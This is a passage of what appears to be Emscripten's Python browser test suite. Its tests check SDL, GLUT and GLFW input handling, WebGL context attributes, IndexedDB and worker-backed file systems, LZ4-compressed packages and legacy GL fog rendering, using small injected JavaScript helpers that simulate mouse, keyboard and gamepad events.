if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
    """SDL mouse coordinates when the canvas is offset inside the page.

    Unlike test_sdl_mouse, simulateMouseEvent here passes raw page
    coordinates (no canvas-offset adjustment), and a custom page.html places
    the canvas inside an absolutely-positioned container, so the C side must
    resolve the offsets itself (-DTEST_SDL_MOUSE_OFFSETS).
    """
    create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    # Custom shell: canvas nested in an offset container, plus a textarea
    # capturing Module.print output for debugging.
    create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
    self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
    self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
    """GLUT touch event handling."""
    self.btest('glut_touchevents.c', expected='1', args=['-lglut'])
def test_glut_wheelevents(self):
    """GLUT mouse-wheel event handling."""
    self.btest('glut_wheelevents.c', expected='1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
    """glutGet() attribute queries, with anti-aliasing left disabled."""
    for defines in ([], ['-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']):
        self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'] + defines)
# This test supersedes the one above, but it's skipped in the CI because
# anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
    """glutGet() attribute queries, including the anti-aliasing attribute."""
    for defines in ([], ['-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']):
        self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'] + defines)
def test_sdl_joystick_1(self):
    """SDL joystick against the Working Draft Gamepad API, where buttons are
    plain numbers (0/1) rather than objects."""
    # Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
    # http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
    create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
    self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
    self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
    """SDL joystick against the Editor's Draft Gamepad API, where each button
    is a {pressed, value} object that is mutated in place (Firefox style)."""
    # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
    # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
    create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
    self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
    self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
    """GLFW joystick support; unlike the SDL tests this also dispatches a
    'gamepadconnected' event, which GLFW requires to notice the pad."""
    # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
    # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
    create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
    self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
    self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
    """WebGL context-attribute handling (antialias/depth/stencil/alpha)
    across GLUT, SDL, SDL2 and GLFW front ends, both enabled and disabled."""
    # Javascript code to check the attributes support we want to test in the WebGL implementation
    # (request the attribute, create a context and check its value afterwards in the context attributes).
    # Tests will succeed when an attribute is not supported.
    create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
    # Copy common code file to temporary directory
    filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
    temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
    shutil.copyfile(filepath, temp_filepath)
    # perform tests with attributes activated
    self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
    self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
    self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
    self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
    # perform tests with attributes desactivated
    # NOTE(review): no SDL2 run in the deactivated set — looks intentional
    # but worth confirming.
    self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
    self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
    self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
    """A WebGL error must not be reported twice."""
    self.btest('webgl_error.cpp', expected='0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set
# Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
    shell = path_from_root('tests/preinitialized_webgl_context.html')
    self.btest('preinitialized_webgl_context.cpp', '5',
               args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', shell])
@requires_threads
def test_emscripten_get_now(self):
    """emscripten_get_now() in plain, pthreads, and closure/web builds."""
    variants = ([], ['-s', 'USE_PTHREADS'],
                ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
    for args in variants:
        self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
    """Writing a file works in a web-only (ENVIRONMENT=web) build."""
    build_args = ['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1']
    self.btest_exit('write_file.c', 0, args=build_args)
def test_fflush(self):
    """Buffered stdio output is flushed when the runtime exits."""
    shell = path_from_root('tests', 'test_fflush.html')
    self.btest('test_fflush.cpp', '0',
               args=['-s', 'EXIT_RUNTIME', '--shell-file', shell],
               reporting=Reporting.NONE)
def test_file_db(self):
    """IndexedDB-backed file persistence across separate page loads.

    Run 1 (-DFIRST) stores the preloaded file; run 2 reads it back from the
    database; run 3 confirms stored data wins over a freshly preloaded file.
    Each intermediate test.html is saved for post-mortem inspection.
    """
    secret = str(time.time())
    create_test_file('moar.txt', secret)
    self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
    shutil.copyfile('test.html', 'first.html')
    self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
    shutil.copyfile('test.html', 'second.html')
    create_test_file('moar.txt', 'aliantha')
    self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
    shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
    """IDBFS syncfs: the -DFIRST run persists data, the second run reads it.

    NOTE(review): '-lidbfs.js' appears twice in each args list, and the
    -DFIRST run is repeated unchanged for every `extra` variant — both look
    redundant but harmless; confirm before cleaning up.
    """
    for extra in [[], ['-DEXTRA_WORK']]:
        secret = str(time.time())
        self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
        self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
    """IDBFS syncfs when the program force-exits (EXIT_RUNTIME + -DFORCE_EXIT)."""
    secret = str(time.time())
    common = ['-DSECRET=\"' + secret + '\"', '-s',
              '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''',
              '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js']
    for defines in (['-DFIRST'], []):
        self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1',
                   args=['-lidbfs.js'] + defines + common)
def test_fs_idbfs_fsync(self):
    """fsync() on IDBFS; pre.js mounts the FS and syncs persisted state into
    memory before main() runs (gated by a run dependency)."""
    # sync from persisted state into memory before main()
    create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');

FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')

    args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
    secret = str(time.time())
    self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
    self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
    """fsync() on MEMFS with asyncify and runtime exit enabled."""
    secret = str(time.time())
    base_args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
    self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1',
               args=base_args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
    """Read Blob- and File-backed entries through WORKERFS inside a worker."""
    secret = 'a' * 10
    secret2 = 'b' * 10
    # pre.js mounts a WORKERFS containing one Blob and one File whose
    # contents are the two secrets; the C side verifies both.
    create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
    self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
    """Read a file-packager package through WORKERFS in a worker.

    Packages file1.txt and sub/file2.txt with --separate-metadata, then runs
    the test proxied to a worker.
    """
    create_test_file('file1.txt', 'first')
    ensure_dir('sub')
    # Use a context manager so the file is flushed and closed before the
    # packager reads it (the original `open(...).write(...)` relied on
    # CPython refcounting to close the handle).
    with open(os.path.join('sub', 'file2.txt'), 'w') as f:
        f.write('second')
    self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt',
                      os.path.join('sub', 'file2.txt'),
                      '--separate-metadata', '--js-output=files.js'])
    self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1',
               args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
    """LZ4-compressed filesystem packages, produced by emcc and by the packager.

    Generates ~3.75MB of data (two text files and one random binary), then
    exercises LZ4FS: compressed by emcc (-s LZ4=1), pre-compressed by the
    file packager (typical server-side usage), a MODULARIZE build, and
    manual loading at runtime.
    """
    # generate data
    ensure_dir('subdir')
    create_test_file('file1.txt', '0123456789' * (1024 * 128))
    # Use context managers so files are flushed/closed before they are read
    # back (the original `open(...).write(...)` relied on refcounting).
    with open(os.path.join('subdir', 'file2.txt'), 'w') as f:
        f.write('1234567890' * (1024 * 128))
    random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
    random_data[17] = ord('X')  # one known byte so content can be spot-checked
    with open('file3.txt', 'wb') as f:
        f.write(random_data)
    # compress in emcc, -s LZ4=1 tells it to tell the file packager
    print('emcc-normal')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
    assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
    assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2  # over half is gone
    print(' emcc-opts')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
    # compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
    print('normal')
    out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
    with open('files.js', 'wb') as f:
        f.write(out)
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
    print(' opts')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
    print(' modularize')
    self.compile_btest([path_from_root('tests', 'fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
    create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
    self.run_browser('a.html', '.', '/report_result?2')
    # load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
    print('manual')
    subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
    print(' opts')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
    print(' opts+closure')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
    # Former non-lz4 comparison run, previously kept as a dead triple-quoted
    # string; preserved here as a real comment so it cannot be mistaken for
    # live code:
    #   os.mkdir('files')  (ignoring OSError)
    #   copy file1/2/3.txt into files/
    #   out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload',
    #                                  'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
    #   write out to files.js, then:
    #   self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])
def test_separate_metadata_later(self):
    """--separate-metadata packages loaded after the main program starts.

    See issue #6654 - we need to handle separate-metadata both when we run
    before the main program, and when we are run later.
    """
    create_test_file('data.dat', ' ')
    packager_cmd = [FILE_PACKAGER, 'more.data', '--preload', 'data.dat',
                    '--separate-metadata', '--js-output=more.js']
    self.run_process(packager_cmd)
    self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1',
               args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
    """Drive the IDB store test through its scripted sequence of stages."""
    secret = str(time.time())
    stage_sequence = [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]
    for stage in stage_sequence:
        self.clear()
        self.btest(path_from_root('tests', 'idbstore.c'), str(stage),
                   args=['-lidbstore.js', '-DSTAGE=' + str(stage),
                         '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
    """Synchronous IDB store access via asyncify."""
    secret = str(time.time())
    self.clear()
    build_args = ['-lidbstore.js', '-DSECRET=\"' + secret + '\"',
                  '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY']
    self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', args=build_args)
def test_idbstore_sync_worker(self):
    """Synchronous IDB store access via asyncify, proxied to a worker."""
    secret = str(time.time())
    self.clear()
    build_args = ['-lidbstore.js', '-DSECRET=\"' + secret + '\"',
                  '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker',
                  '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY']
    self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', args=build_args)
def test_force_exit(self):
    """exit() terminates the program when EXIT_RUNTIME is set."""
    self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
    """Key events are picked up via SDL_PumpEvents; pre.js synthesizes them."""
    # key events should be detected using SDL_PumpEvents
    create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
    self.btest_exit('sdl_pumpevents.c', expected='7',
                    args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
    """SDL canvas sizing, using a dedicated shell file."""
    shell = path_from_root('tests', 'sdl_canvas_size.html')
    self.btest('sdl_canvas_size.c', expected='1',
               args=['-O2', '--minify', '0', '--shell-file', shell,
                     '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
    """SDL + OpenGL glReadPixels round-trip."""
    compile_cmd = [path_from_root('tests', 'sdl_gl_read.c'),
                   '-o', 'something.html', '-lSDL', '-lGL']
    self.compile_btest(compile_cmd)
    self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
    """glMapBuffer-style access through FULL_ES3."""
    self.btest('sdl_gl_mapbuffers.c', expected='1',
               args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
               message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
    """SDL + legacy GL emulation rendering, compared against a reference image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['-O2', '--minify', '0', '--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png',
               reference_slack=1, args=build_args,
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
    """Same rendering as test_sdl_ogl, but through the Regal GL layer."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['-O2', '--minify', '0', '--preload-file', 'screenshot.png',
                  '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png',
               reference_slack=1, args=build_args,
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
    """Legacy GL emulation rendering without an explicit glMatrixMode call."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['--minify', '0', '--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_ogl_defaultMatrixMode.c',
               reference='screenshot-gray-purple.png', reference_slack=1,
               args=build_args,
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
    """Immediate-mode GL with client-side pointers under legacy GL emulation."""
    # Immediate mode with pointers
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_ogl_p.c', reference='screenshot-gray.png',
               reference_slack=1, args=build_args,
               message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
    """GL entry points resolved through proc-address aliases."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['-O2', '-g2', '-s', 'INLINING_LIMIT',
                  '--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png',
               reference_slack=1, args=build_args)
@requires_graphics_hardware
def test_sdl_fog_simple(self):
    """Basic GL fog rendering under legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['-O2', '--minify', '0', '--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
               args=build_args, message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
    """GL fog with negative fog coordinates under legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
               args=build_args, message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
    """GL fog density mode under legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
               args=build_args, message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
    """GL_EXP2 fog mode under legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
               args=build_args, message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
    """GL_LINEAR fog mode under legacy GL emulation."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    build_args = ['--preload-file', 'screenshot.png',
                  '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins',
                  '-lSDL', '-lGL']
    self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png',
               reference_slack=1, args=build_args,
               message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
    """GLFW under legacy GL emulation, with the default and explicit GLFW 2 API."""
    for extra in ([], ['-s', 'USE_GLFW=2']):
        self.btest('glfw.c', '1',
                   args=['-s', 'LEGACY_GL_EMULATION'] + extra + ['-lglfw', '-lGL'])
def test_glfw_minimal(self):
    """Minimal GLFW program, with the default and explicit GLFW 2 API."""
